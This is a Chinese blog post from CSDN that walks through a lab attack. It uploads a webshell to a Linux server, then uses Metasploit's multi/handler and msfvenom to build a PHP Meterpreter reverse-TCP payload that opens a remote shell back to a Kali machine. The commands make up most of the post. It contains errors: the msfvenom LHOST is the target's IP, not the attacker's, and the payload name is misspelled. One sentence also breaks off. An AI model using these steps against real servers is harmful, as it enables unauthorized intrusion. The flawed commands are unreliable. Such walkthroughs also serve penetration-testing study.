msf反弹php shell,msf实现linux shell反弹

本文介绍了在kali Linux环境下,针对192.168.123.5服务器上的80端口进行渗透测试的过程。通过使用Meterpreter payload,设置回连到kali的IP地址,生成并上传一句话木马,成功反弹了shell。在获得www权限后,文章预告了后续的提权技巧,但具体的提权方法将在下期分享。
摘要由CSDN通过智能技术生成

66b39cefea89699334f2cf28c29bb452.gif

运行环境:

kali       ip:192.168.123.90

Linux    ip:192.168.123.5

Linux服务器上开有80端口,并且有上传

话不多说,上传一句话,菜刀连接。

66b39cefea89699334f2cf28c29bb452.gif

然后打开kali 并启动msf

进入 >   use exploit/multi/handler

设置 payload>   set payload php/metrpreter/reverse_tcp

66b39cefea89699334f2cf28c29bb452.gif

设置IP  > set lhost 192.168.123.90

66b39cefea89699334f2cf28c29bb452.gif

查看一下参数>show options

66b39cefea89699334f2cf28c29bb452.gif

没啥问题开始监听>run

66b39cefea89699334f2cf28c29bb452.gif

再在终端上生产msf

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php

然后将产生的

66b39cefea89699334f2cf28c29bb452.gif

我们再看msf发现已经有会话反弹过来了,我们接下来看一下

66b39cefea89699334f2cf28c29bb452.gif

然后我们查看并进入会话查看信息

66b39cefea89699334f2cf28c29bb452.gif

进入shell

66b39cefea89699334f2cf28c29bb452.gif

上面已经进入shell 并且执行的ls命令,下面让我们看下权限

66b39cefea89699334f2cf28c29bb452.gif

是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。

本人也是小菜,望大佬勿喷。

有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值